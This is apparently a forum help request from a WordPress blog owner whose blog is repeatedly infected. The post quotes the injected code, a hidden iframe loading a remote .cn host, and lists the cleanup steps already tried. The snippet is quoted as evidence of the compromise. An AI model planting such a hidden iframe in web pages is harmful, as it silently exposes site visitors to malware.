I'm totally at a loss because my blog keeps getting infected with malware. My blog is hosted as part of my website (through Logjamming) and no matter what I do, this stupid iframe keeps making its way into the blog (but not anywhere on the website): <iframe src=http://gcounter.cn style=display:none>
Here are all of the steps I've taken:
Updated to latest WordPress version
Changed all my passwords (several times)
Changed my theme and deleted all old themes and plugins
Added secret keys in the config file
Moved my config file into my site root (i read somewhere this would increase security)
The last few times, the iframe appeared in my header or footer. Today it wound up hidden in my blog roll. I'm at a total loss at this point for how to prevent this from happening again.
On a separate note, every time I change my password and then try to change it in the config file, the blog doesn't appear on the web.